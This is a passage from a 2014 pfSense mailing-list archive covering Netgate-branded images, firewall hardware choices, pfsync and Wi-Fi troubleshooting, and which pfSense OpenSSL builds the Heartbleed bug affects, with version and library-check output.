it's more than adequate for my home Internet connection. Basic packet passing between two Gigabit hosts seems to top out at about 250Mbits/sec. There is currently no way to pass boot options (such as single-user mode) to the kernel from U-Boot. Hardware crypto acceleration via /dev/crypto seems to work. Use AES in CBC mode to see a huge speedup over CTR. etc. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] FreeBSD 10.0 on Ubiquiti EdgeRouter Lite
On Feb 12, 2014, at 9:41 AM, Eugen Leitl eu...@leitl.org wrote: On Wed, Feb 12, 2014 at 08:05:17AM -0700, David Burgess wrote: That's great news. Does anybody care to speculate whether FreeBSD will be able to take advantage of the packet forwarding acceleration of this hardware at some point? IIRC you need NDAs for that, so unless it's cleanroom reversed we're SOL. Not really. Even if it’s proprietary (and can’t be open sourced), what you’re after is the functionality, yes? jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] FreeBSD 10.0 on Ubiquiti EdgeRouter Lite
On Feb 12, 2014, at 9:55 AM, Eugen Leitl eu...@leitl.org wrote: On Wed, Feb 12, 2014 at 09:44:46AM -0600, Jim Thompson wrote: On Feb 12, 2014, at 9:41 AM, Eugen Leitl eu...@leitl.org wrote: On Wed, Feb 12, 2014 at 08:05:17AM -0700, David Burgess wrote: That's great news. Does anybody care to speculate whether FreeBSD will be able to take advantage of the packet forwarding acceleration of this hardware at some point? IIRC you need NDAs for that, so unless it's cleanroom reversed we're SOL. Not really. Even if it’s proprietary (and can’t be open sourced), what you’re after is the functionality, yes? Can the blobs be reversed so easily? (Too bad about lack of IPv6 offloading, but we can live with that for a while, I guess). I don’t know. If you’re really curious, you can read this: http://university.caviumnetworks.com/downloads/Mini_version_of_Prog_Guide_EDU_July_2010.pdf to find out how to get ahold the real programming guide from Cavium, then read Chapter 2 “Packet Flow” in same. This might give you some ideas as well: https://hactive.googlecode.com/files/CN50XX-HRM-V0.99E.pdf Note that this link seems to support the idea that IPv6 processing is supported by the hardware (see, for example, Sections 7.2.4, 7.5 and 7.7). I do know that *I* don’t want to invest a ton of RE effort in a $99 platform that bears near zero margins, when far, far faster Intel / AMD platforms that aren’t more than 2-3X the price are just around the corner. Note slide 17 in this: https://noppa.aalto.fi/noppa/kurssi/s-38.3310/harjoitustyot/S-38_3310_matias_elo.pdf Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] FreeBSD 10.0 on Ubiquiti EdgeRouter Lite
On Feb 12, 2014, at 12:16 PM, Brian Caouette bri...@dlois.com wrote: Sounds good. Is there a planned feature list we can look forward too? On 2/12/2014 10:43 AM, Jim Thompson wrote: The reality is “when it’s done”. I’m hoping for “mid-May”. On Feb 12, 2014, at 9:28 AM, Brian Caouette bri...@dlois.com wrote: What is the time frame for 2.2? Is there a planned revenue stream? The answer to both is ‘No’. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Netgate's customized pfSense release
On Feb 13, 2014, at 12:10 PM, Chris Buechler c...@pfsense.org wrote: On Thursday, February 13, 2014, Andrew Hull l...@coffeebreath.org wrote: Hi List, Having purchased several pfSense devices assembled by Netgate (m1n1wall and FW-7541), I've noticed that the pfSense pre-install image was customized with Netgate branding and the firmware auto-update mechanism was set to a Netgate URL. Has this been discussed on the list before? I’m not sure why it would be discussed on the list. It’s an business matter between ESF and Netgate. My knee jerk reaction is that this is A Bad Thing(tm), and I reloaded the devices with images from ESF. No, no, no. Custom hardware-specific images are a good thing - when done by us, as in the case of Netgate. More when I'm not on my phone. Indeed. You’ll see more of this in the future. It supports the project in a big way. Perhaps you don’t care about that, but I do. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Netgate's customized pfSense release
On Feb 13, 2014, at 11:30 AM, Mathieu Simon (Lists) matsimon.li...@simweb.ch wrote: Am 13.02.2014 17:54, schrieb Andrew Hull: [...] I've noticed that the pfSense pre-install image was customized with Netgate branding and the firmware auto-update mechanism was set to a Netgate URL. Has this been discussed on the list before? I don't think often for what I can remember. My knee jerk reaction is that this is A Bad Thing(tm), and I reloaded the devices with images from ESF. Does anyone here have a strong opinion one way or the other? No worries, that's how open source works, and in case of the BSD license there are are almost all liberties to do derivative products, as long as you follow minimal rules and trademark (pfSense and the logo are trademarks of ESF). Netgate allows you to run what image you like, other (non pfSense) appliance vendors are way less nice :-) Common guess: Beyond branding, their images may contain pre-done tuning for the hardware that makes it perform at its best without extra user intervention. In comparison, at one place I have a 3-letter brand server running pfSense and I had to spend some time on loader.conf.local and tunings to make all NICs work and work good (props to ESF staff who assisted). Quick history: BSD Perimeter moved from Kentucky (in 2012) to Texas and reinstated as ESF. Jim Thompson from Netgate (also Texas) got involved with ESF, he is actually active in both companies. In mid-2012, Chris approached several parties, including the principals of Netgate to investigate their interest in purchasing the interest in BSD Perimeter formerly held by Scott Ulrich. In August 2012, the principals of Netgate completed the purchase of those shares. Subsequently, Chris moved to Texas (his idea, not forced on him in any way). (To be perfectly clear on the history, Netgate was, quite literally, the first support customer of BSD Perimeter, back in 2006, and has continuously supported the project from that day until now.) That may explain why Netgate is permitted to redistribute modifed images without the need to rename the resulting product binaries or replacing the logos. (Jim, correct me I'm writing this out of my memory, I remember there was once a post or a mailing list discussion) Given that I’m managing both companies, some things get ‘shared’ (Netgate and ESF run on a common set of infrastructure (switches, servers, etc) though in some cases, the usage is exclusively ESF (e.g. the co-location at NYI.) Those of us in Austin (and there is more headcount under ESF than you might imagine) are all collocated in the same office space. That all said: 1) I really do try to keep Netgate and ESF ‘separate’ in terms of business. 2) Co-branding is permitted, and even encouraged, if done under the auspices of the ESF program directed to same. There is revenue attached that flows to ESF, and thus, directly supports the project. These releases are built on the same (identical) infrastructure, from the same tree, by ESF personnel. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Netgate's customized pfSense release
On Feb 14, 2014, at 5:15 AM, Jostein Elvaker Haande jehaa...@gmail.com wrote: On 14 February 2014 11:54, Brian Candler b.cand...@pobox.com wrote: On 13/02/2014 19:43, Jostein Elvaker Haande wrote: The thing that brand names as Netgear now sells out of the box [..] I welcome Netgear to the pfSense community as a most welcome addition, and I hope to see similar additions in the time to come. That would be Netgate, not Netgear :-) Oooops! :) Slight slip of the fingers that. You would not believe how often it happens. It’s likely that some of you don’t know that Netgate was originally the name of a source-available(*) packet filter for SunOS(**) in 1991. See, for example: http://www.greatcircle.com/firewalls/mhonarc/firewalls.199309/msg00092.html Jim (*) the term “open source” had yet to exist in 1991, which was when ‘SmallWorks’, the company behind the Netgate firewall, was formed. (**) FreeBSD didn’t exist in 1991, either. ’Netgate' ran on BSDI’s BSD/OS though we never formally launched it the platform. Rob Kolstad was my boss at Convex in the mid-80s. So I knew those guys really well, but the USL lawsuit prevented our launch on BSD/OS. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] pfsync state full resync
See your link http://www.openbsd.org/faq/pf/carp.html It's all in there. -- Jim On Feb 16, 2014, at 12:03, rajan agarwal rajanagarwa...@gmail.com wrote: I was about to post the same question. Thanks Brian, been facing a problem with this in my 2 pfsense setup. On Sun, Feb 16, 2014 at 7:20 PM, Brian Candler b.cand...@pobox.com wrote: I have a question about pfsync failover. Suppose you have a master/slave firewall pair; the master is broadcasting updates to its state table and the slave is picking them up. Then you reboot the master firewall. The slave firewall takes over. When the master firewall comes back, its state table will initiallly be empty. So does it have a way to request from the slave a dump of the current state table? And will this transfer be completed before it becomes master on any CARP interfaces? I can't see this situation described at http://www.openbsd.org/faq/pf/carp.html http://www.openbsd.org/cgi-bin/man.cgi?query=pfsyncsektion=4manpath=OpenBSD+5.4 It talks about state change messages but not a full resync. However, I can find a hint of a bulk transfer here: http://www.freebsd.org/cgi/man.cgi?query=pfsyncsektion=4 and in this old posting: http://lists.freebsd.org/pipermail/freebsd-net/2006-May/010823.html Thanks, Brian. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Wifi/WAN issues
On Mar 6, 2014, at 5:26, Jeremy Bennett jbenn...@hikitechnology.com wrote: What am I doing wrong? You're running a more modern card than supported in pfSense 2.1, which is based on FreeBSD 8.3. Perhaps 2.2 will fix the issue. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Wifi/WAN issues
On Mar 6, 2014, at 12:51 PM, Jeremy Bennett jbenn...@hikitechnology.com wrote: I spoke to the good folks at Netgate, and they assured me that the card was indeed compatible with 2.1. From what I've seen, they've always been very responsible with the products they sell and they were very helpful when I raised the issue with them. So, that said, any other ideas? Yeah, my mistake. (Note my employer…) I thought you had a more modern Atheros card. These things typically turn out to be RF issues. poor connection of the pigtail, high signal levels in the environment, etc. In your particular case, you report: In configuring the WAN interface, I set the card to infrastructure mode (BSS) and fill in the network I'm trying to join's name (wireless_network”).” and If I go to status interfaces, I see that the status says no carrier I setup an open network off of my cell phone and submitted the SSID of my phone's network and I get the same status : no carrier result.” So we don’t know if your card is even receiving beacon frames. Can you drop to a shell and run ifconfig wlan0 scan” (for whatever the name of your interface is)? Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] (no subject)
Chris had to rebuild lists.pfsense.org, as one of the databases became corrupted. You might have gotten added in that process. On Mar 19, 2014, at 1:54 PM, Doug Barton do...@dougbarton.us wrote: Actually I'm sort of curious as to how I got on the list in the first place. I certainly did not sigh up for it. I can figure out how to remove myself of course, but was there some sort of mass involuntary subscription process that occurred in the last 24-36 hours? Doug On 3/19/2014 11:48 AM, Vick Khera wrote: because clicking the link at the bottom of every message you get from the list is too hard? On Wed, Mar 19, 2014 at 2:25 PM, robert gledhill robert...@gmail.com mailto:robert...@gmail.com wrote: Remove me ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Blast from the past: pfSense 1.2 / ALIX / VLANs
What's your time worth? -- Jim On Mar 24, 2014, at 9:03, Stefan Baur newsgroups.ma...@stefanbaur.de wrote: Am 24.03.2014 14:18, schrieb Chris Bagnall: However, the new tenant found that performance was erratic - certain websites loaded instantly, but others wouldn't load at all. This normally screams classic MTU problems, in my experience, but I normally see these on weird WAN connections, not on the LAN. Does anyone know if there are/were 'problems' with 1.2 and VLAN MTUs on ALIX platforms (ethernet driver 'vr'), and whether an update to 1.3 might fix it? This is old hardware with only 128MB RAM, so jumping to 2.x is optimistic. The site in question is a couple of hundred miles away from me, so 'try it and see' isn't really an option in this case. :-) While I do have to admint that I don't have experience with the particular ethernet driver you mention, I know that there are several Unix Operating Systems where not all ethernet drivers are capable of dealing with the added bytes that a VLAN tag brings with it. IIRC, VLAN needs four bytes, so instead of upgrading to 1.3 you could first try to set the MTU to 1496 instead of the usual 1500. -Stefan ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] successor to ALIX is here
On Apr 2, 2014, at 3:17 PM, Thinker Rix thinke...@rocketmail.com wrote: On 2014-04-02 17:35, Eugen Leitl wrote: Apu.1c http://www.heise.de/newsticker/meldung/Embeddded-Mainboard-mit-x86-CPU-und-Coreboot-2160404.html http://www.pcengines.ch/apu1c.htm in stock, €105.13 Unfortunately again only 3 NICs... and Realteks with bad performance. I would love to see such a board one day with at least 4-8 NICs. Such things are literally, on the way, but aren’t going to be priced similarly to the APU. Jim ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] successor to ALIX is here
On Apr 2, 2014, at 3:24 PM, Ryan Coleman ryanjc...@me.com wrote: Wouldn’t a layer-3 switch be a good investment in this situation? Put the load on another device instead of, what is for all intents and (definitely) purpose a thin, light-weight piece of hardware? It doesn’t even need to be a layer-3 switch. A decent layer-2 switch with enough programmable control would do it. Such switches (layer 2 and even layer 3) exist, and programmable control can be had (sometimes) via protocols like OpenFlow. The obvious path here is pfSense - ofSense as a controller for OpenFlow hardware. Not that this isn’t already being actively discussed inside Netgate or anything… :-) (here is a huge hint: http://store.netgate.com/Switches-C167.aspx) This would enable multiples of 10G performance for load-balancing, packet filtering, and even NAT (with the right switch hardware). The only issue here is that such switches tend to be a bit … pricey. Thusfar, the community hasn’t shown a lot of appetite for solutions that cost more than a few hundred dollars. Even Chris continually touts that an Alix board is “enough for most people”. He’s right, except that the world of existing networking doesn’t allow a lot of flexibility, and even home users might find that the complexity of configuring NAT/VLANs/packet filtering/caching/… is a bit much. I’m not saying that a home user needs a $3,000 openflow switch, but a $300 solution with 3-4 Gb Ethernet ports should be more than adequate, since, in the right scenarios, even a Gb/s Google Fiber feed could be handled by a 2-4 core SoC and a set of re-architected software. Jim___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] successor to ALIX is here
On Apr 2, 2014, at 5:01 PM, Chris Bagnall pfse...@lists.minotaur.cc wrote: On 2/4/14 9:17 pm, Thinker Rix wrote: Unfortunately again only 3 NICs... and Realteks with bad performance. I would love to see such a board one day with at least 4-8 NICs. On that subject, we've recently been experimenting with these: http://linitx.com/product/jetway-jbc373-intel-atom-d525-barebone-system-quad-gigabit-lan/13700 Initial results seem promising, they've got a CF slot, and they're not a great deal more expensive than the ALIX units were. Yeah, we carried those for a while, then they started coming back, so we carrying it in the store, and are moving the remaining inventory on Amazon. I think we called it the FW-525B. They (also) have RealTek NICs. YMMV. Jim ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] New intel atom board
On Apr 5, 2014, at 12:48 PM, Ugo Bellavance u...@lubik.ca wrote: http://techcrunch.com/2014/04/03/intel-releases-99-minnowboard-max-an-open-source-single-board-computer/?utm_campaign=fbncid=fb An interesting platform for pfSense? It looks like it only has 1 NIC though. I looked at this earlier in the week when it was released. It’s interesting, (AES-NI and VT-x support! http://ark.intel.com/products/78475/Intel-Atom-Processor-E3845-2M-Cache-1_91-GHz) and Circuitco is just up the highway in Richardson, TX. I’ve considered driving up and seeing what it would take to take the schematics (when they are available) and have a board built with 2 Ethernets (rather than one), and maybe a miniPCIe socket (for an 802.11 NIC, as pfSense 2.2 should make a lot more of these work, or possibly an m-sata drive), in addition to pulling the expansion header off, and connectorizing the serial ‘debug’ header for a proper console. We would need a simple enclosure as well.Painted (or powder-coated) steel is less expensive than anodized aluminum, but I think the anodized aluminum looks nicer, and it can be laser engraved. The other issue is single or dual core and 1GB or 2GB ram (4GB?)? How interesting is the m-sata / miniPCIe option? How you can help: Indicate your level of interest. This board would without a doubt cost more than the minnow board. I don’t know how much more, but we’re not going to hit the same volumes as the minnow board. (I could be wrong.) The minnow board could be subsidized by Intel. (I could be wrong.) It’s going to require a significant investment (up-front NRE), an investment in getting a run of these made, and some return on those investments (profit). How important is form-factor? Larger PCBs cost more, but can sometimes relax routing enough to not need additional layers (fewer layers tend to cost less). - miniPCIe is going to require a connector (these cost money to both buy and place) - m-sata also requires a switch, such that if the m-sata drive is in-place it is connected to the SATA controller - RAM costs. At these densities, 2GB of ram costs twice as much as 1GB of ram. 4GB of ram costs 4X as much as 1GB of ram. making lots of different variants of the boards costs extra to both manufacture (stop the line, load the new parts, run the new SKU) and inventory. - dual core or single core?Remember that pfSense 2.2 (which is based on FreeBSD 10) supports a pf capable of multi-threading. Jim ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] 2.1 can't auto-update anymore?
Kevin, Glad you like the update. You won’t get ‘mutlicore’ PF until pfSense 2.2 (which is based on FreeBSD 10). Snapshots are available now. Rangely hardware, you say? http://store.netgate.com/Firewall/C2758.aspx Also available “real soon now at the pfSense store. We believe in the C2000, so there will be other hardware leveraging that series coming available this year. And yes, I agree that pfSense 2.2 will perform very well on the Intel C2000 series SoCs. You’ll notice that rather than create a “commercial version” of pfSense, (as many want to accuse me of doing), we just put the drivers in pfSense 2.1.1, where everyone can enjoy them. What you don’t get in the community builds is the testing/tuning that are part of the above. The results are significantly better than a stock load. But even here, I’m working on a way to make those “platform-specific” tuning parameters available to the community. Jim On Apr 5, 2014, at 4:17 PM, Kevin Boatswain kboat...@gmail.com wrote: Well i just upgraded sucessfully thanks alot for the fix. Dont know if its the sugar pill effect but general web browsing seems MUCH MUCH Faster (and it wasnt slow to begin with). I'm guessing this is due to many of the improvements including the updated PF for multicore. Not time to look at the supermicro versions of the Rangeley or Avoton platforms as I was waiting until PFSense supported the new i354 and i210 nics. These would make AWESOME pfsense platforms. http://www.servethehome.com/Server-detail/intel-atom-c2750-8-core-avoton-rangeley-benchmarks-fast-power/ On Sat, Apr 5, 2014 at 3:39 PM, Jeremy Porter jpor...@netgate.com wrote: There was an error in one of the version number strings, this has been fixed. (It didn't replicate to one of the mirrors correctly.) Auto-update is just a quick link to the upgrade system, it dose not automatically upgrade the firewall without clicking on it, so if your firewall is offline, that is likely a different problem. On 4/5/2014 2:48 PM, Kevin Boatswain wrote: I am having the same issue on my box. Downloading new version information...done Unable to check for updates. Could not contact pfSense update server http://updates.pfsense.org/_updaters At first I thought maybe my box needed to be rebooted but seeing your message and the forum post below makes me wonder is there something wrong with the upgrade url or am I supposed to be using a new upgrade url? https://forum.pfsense.org/index.php?topic=74639.0 I am currently using http://updates.pfsense.org/_updaters for my update url as well. Odd that you were able to update from the console however. I wonder does the console use the same url listed in the Gui? On Sat, Apr 5, 2014 at 1:46 PM, Brian Caouette bri...@dlois.com wrote: I see the same thing. I also notice I can no longer get online. I haven't touched the box in over a month. It went from working to not working. I can only assume its related to the auto update to 2.1.1 On 4/5/2014 2:40 PM, Adam Thompson wrote: On 14-04-05 01:31 PM, Adam Thompson wrote: My own 2.1-release pfSense now can't auto-update. After updating from the console to 2.1.1, the web GUI *still* can't handle auto-update checking. Ordinarily, I'd assume misconfiguration, but the only thing affected is the web UI. WTF? -- -Adam Thompson athom...@athompso.net ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] New intel atom board
On Apr 5, 2014, at 5:06 PM, Adam Thompson athom...@athompso.net wrote: On 14-04-05 02:02 PM, Jim Thompson wrote: http://techcrunch.com/2014/04/03/intel-releases-99-minnowboard-max-an-open-source-single-board-computer/?utm_campaign=fbncid=fb An interesting platform for pfSense? It looks like it only has 1 NIC though. I looked at this earlier in the week when it was released. It’s interesting, [...] and Circuitco is just up the highway in Richardson, TX. I’ve considered driving up and seeing what it would take to take the schematics (when they are available) and have a board built with 2 Ethernets (rather than one), and maybe a miniPCIe socket (for an 802.11 NIC, as pfSense 2.2 should make a lot more of these work, or possibly an m-sata drive), in addition to pulling the expansion header off, and connectorizing the serial ‘debug’ header for a proper console. Given the high up-front costs to produce a variant board, wouldn't it be easier, faster and cheaper to just use the expansion header, which IIRC includes two PCIe 1x lanes? If a breakout cable existed that provided 2 PCIe slots, it would be possible to simultaneously have much more flexibility in enclosure design (e.g. PCIe cards underneath the board?) as well as flexibility in choice of add-on. The expansion header only includes one PCIex1 2.0 lane, 1x SATA2, 1x USB 2.0 host, I2C, GPIO, JTAG, +5VDC, GND http://www.minnowboard.org/meet-minnowboard-max/ I don't see that a breakout cable exists yet for the high-speed expansion bus, so there's that minor (*cough*) problem... but that seems a much smaller problem than re-tooling the board. We would need a simple enclosure as well.Painted (or powder-coated) steel is less expensive than anodized aluminum, but I think the anodized aluminum looks In case you don't have a local firm you're happy with, talk to Protocase for sample qtys. I've seen them be cheaper than mass mfg for small runs of simple cases (e.g. interlocked-U style). We have a local firm we’re pretty happy with. We also have a lot of experience in injection molding now (smallworks.com) The other issue is single or dual core and 1GB or 2GB ram (4GB?)? The stock 2GB version should be adequate (barely) IMHO for most applications that function with that class of CPU/ethernet/storage anyway. Much more interesting to me would be if a small, low-cost board like that were available with ECC. That CPU does support ECC RAM, after all… yes it does. ECC ram is also a lot more expensive. How interesting is the m-sata / miniPCIe option? Not to me, as I tend to deploy pfSense at the higher-end of the spectrum, but *some* way to add WiFi would probably be important for the putative target audience. USB probably won't cut it for an AP, so mPCIe is probably needed. Again, expansion-header-to-mPCIe should be possible instead of reworking the board... and unlike PCIe 1x sockets, that wouldn't take up much more room than putting the mPCIe headers on the board. see above. How you can help: Indicate your level of interest. Neat, but not commercially interesting to me right now. Linksys/ASUS/D-Link make cheaper gateways that are good enough for home users, and commercial users will either get a FortiWiFi (or equivalent) or if pfSense, re-use an existing rackmount server. This board would without a doubt cost more than the minnow board. I don’t know how much more, but we’re not going to hit the same volumes as the minnow board. (I could be wrong.) The minnow board could be subsidized by Intel. (I could be wrong.) See above comments :-). I'm not sure if a breakout cable is 100% workable, but if so it's a faster/cheaper option than mPCIe. It’s going to require a significant investment (up-front NRE), an investment in getting a run of these made, and some return on those investments (profit). How important is form-factor? Larger PCBs cost more, but can sometimes relax routing enough to not need additional layers (fewer layers tend to cost less). Smaller is better. Otherwise I may as well just deploy a miniITX or 1U system. Which, yes, argues *against* using a breakout cable for PCIe. - dual core or single core?Remember that pfSense 2.2 (which is based on FreeBSD 10) supports a pf capable of multi-threading. Good question - optimize for today or for tomorrow? Back when I was a teenager, I liked to hang out in the local speed shop. There was a plaque on the wall, with a very bent connecting rod, and the following lettered below it: “Speed costs money, son. How fast do you want to go?” This was before Mad Max appropriated it: http://www.imdb.com/title/tt0079501/quotes?item=qt0427399 Jim ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] The Heartbleed Bug, CVE-2014-0160
Well, that’s the point, Paul. (You hit the nail on the head.) If you don’t have an openssl service exposed, the problem doesn’t affect you. Since normally the web GUI isn’t exposed to the WAN, the attack surface is minimized. We are working at cutting a new release. Jim On Apr 8, 2014, at 1:49 PM, Paul Galati paulgal...@gmail.com wrote: Is this vulnerability tied to a secure web connection on the wan interface? If I do not have the web gui enabled on the wan interface and I am not using openVPN, what other services allow this point of entry possible? Thanks for your time. Paul Galati paulgal...@gmail.com On Apr 8, 2014, at 8:20 AM, Marek Salwerowicz marek_...@wp.pl wrote: Regarding the web test provided at: http://filippo.io/Heartbleed/ All my pfSense firewalls (their HTTPS WEB GUI) are vulnerable... ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] The Heartbleed Bug, CVE-2014-0160
On Apr 8, 2014, at 12:34 PM, Paul Heinlein heinl...@madboa.com wrote: On Tue, 8 Apr 2014, b...@todoo.biz wrote: This might not be enough as there are two versions of openssl installed… One in /usr/bin/openssl and one in /usr/local/bin/openssl Both should be ok. Not on 2.1: [2.1-RELEASE]/root(9): /usr/local/bin/openssl version OpenSSL 1.0.1e 11 Feb 2013 Worse, that's the version used by OpenVPN and lighttpd: Your use of “worse” here merely pours gasoline on an already burning fire. [2.1-RELEASE]/root(8): ldd /usr/local/sbin/openvpn /usr/local/sbin/openvpn: libssl.so.8 = /usr/local/lib/libssl.so.8 (0x8007e9000) libcrypto.so.8 = /usr/local/lib/libcrypto.so.8 (0x80094f000) [2.1-RELEASE]/root(14): ldd /usr/local/sbin/lighttpd /usr/local/sbin/lighttpd: libssl.so.8 = /usr/local/lib/libssl.so.8 (0x8007d3000) libcrypto.so.8 = /usr/local/lib/libcrypto.so.8 (0x800939000) The situation is no different with pfSense version 2.1.1, even though the ports version of openssl is 1.0.1f. (1.0.1g is required to be clear of the Heartbleed issue.) [2.1.1-RELEASE][root@pfSense.localdomain]/root(3): /usr/local/bin/openssl version OpenSSL 1.0.1f 6 Jan 2014 [2.1.1-RELEASE][root@pfSense.localdomain]/root(4): /usr/bin/openssl version OpenSSL 0.9.8y 5 Feb 2013 [2.1.1-RELEASE][root@pfSense.localdomain]/root(5): [2.1.1-RELEASE][root@pfSense.localdomain]/root(15): ldd /usr/local/sbin/openvpn /usr/local/sbin/openvpn: liblzo2.so.2 = /usr/local/lib/liblzo2.so.2 (0x8006ca000) libssl.so.8 = /usr/local/lib/libssl.so.8 (0x8007e9000) libcrypto.so.8 = /usr/local/lib/libcrypto.so.8 (0x80094f000) libc.so.7 = /lib/libc.so.7 (0x800c22000) libthr.so.3 = /lib/libthr.so.3 (0x800e4f000) [2.1.1-RELEASE][root@pfSense.localdomain]/root(22): ldd /usr/local/sbin/lighttpd /usr/local/sbin/lighttpd: libpcre.so.3 = /usr/local/lib/libpcre.so.3 (0x80067) libssl.so.8 = /usr/local/lib/libssl.so.8 (0x8007d3000) libcrypto.so.8 = /usr/local/lib/libcrypto.so.8 (0x800939000) libthr.so.3 = /lib/libthr.so.3 (0x800c0c000) libc.so.7 = /lib/libc.so.7 (0x800d25000) As previously mentioned, we’re working on a new release. jim ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] The Heartbleed Bug, CVE-2014-0160
On Apr 8, 2014, at 3:39 PM, Rainer Duffner rai...@ultra-secure.de wrote: Am 08.04.2014 um 21:04 schrieb Jim Thompson j...@smallworks.com: Well, that’s the point, Paul. (You hit the nail on the head.) If you don’t have an openssl service exposed, the problem doesn’t affect you. Since normally the web GUI isn’t exposed to the WAN, the attack surface is minimized. We are working at cutting a new release. Hi, according to: http://www.kb.cert.org/vuls/id/BLUU-9HY33E only FreeBSD 10 is affected. There are binary updates for FreeBSD 10 available, just no advisory-text. No update for FreeBSD 9.1 pfSense 2.1 and 2.1.1 are affected. Jim ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] The Heartbleed Bug, CVE-2014-0160
I believe pfSense users are only affected by the secondary flaw, and also any software in pfSense using the /usr/local/... version of OpenSSL, as mentioned by Vick Khera earlier. Both SAs affect pfSense 2.1 and 2.1.1. Heartbleed is an issue because OpenSSL version 1.0.1f is used for software that is not part of FreeBSD 8.3-RELEASE (i.e. things found in /usr/local) in addition to the version without the Heartbleed issue, which is part of FreeBSD 8.3-RELEASE Both issues are being corrected via pending release of pfSense 2.1.2, as well as a near future rev for the pfSense 2.2 snapshots. -- Jim On Apr 8, 2014, at 21:05, Paul Mather p...@gromit.dlib.vt.edu wrote: On Apr 8, 2014, at 9:35 PM, Paul Mather p...@gromit.dlib.vt.edu wrote: On Apr 8, 2014, at 3:04 PM, Jim Thompson j...@smallworks.com wrote: Well, that’s the point, Paul. (You hit the nail on the head.) If you don’t have an openssl service exposed, the problem doesn’t affect you. Since normally the web GUI isn’t exposed to the WAN, the attack surface is minimised. The FreeBSD Security Advisory FreeBSD-SA-14:06.openssl states this in the Impact section: = III. Impact An attacker who can send a specifically crafted packet to TLS server or client with an established connection can reveal up to 64k of memory of the remote system. Such memory might contain sensitive information, including key material, protected content, etc. which could be directly useful, or might be leveraged to obtain elevated privileges. [CVE-2014-0160] A local attacker might be able to snoop a signing process and might recover the signing key from it. [CVE-2014-0076] = I take that to read the vulnerability being exploitable both ways, i.e., a malicious server could also attack a vulnerable client connecting to it via SSL/TLS, making the attack surface potentially much larger. FWIW, the pre-advisory heads-up message from the FreeBSD Security Officer appears to back this up. It included the following advice: = Users who use TLS client and/or server are strongly advised to apply updates immediately. Because of the nature of this issue, it's also recommended for system administrators to consider revoking all of server certificate, client certificate and keys that is used with these systems and invalidate active authentication credentials with a forced passphrase change. = Just as an followup and clarification to the above, the recent OpenSSL vulnerability Security Advisory actually covers two OpenSSL flaws. The heartbleed flaw only affects FreeBSD 10 in the base OS. All other supported FreeBSD releases are affected by the other flaw they describe (in the ECDSA Montgomery Ladder Approach implementation). I believe pfSense users are only affected by the secondary flaw, and also any software in pfSense using the /usr/local/... version of OpenSSL, as mentioned by Vick Khera earlier. Kudos to the pfSense team for beavering away and cranking out a fix! Cheers, Paul. ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] The Heartbleed Bug, CVE-2014-0160
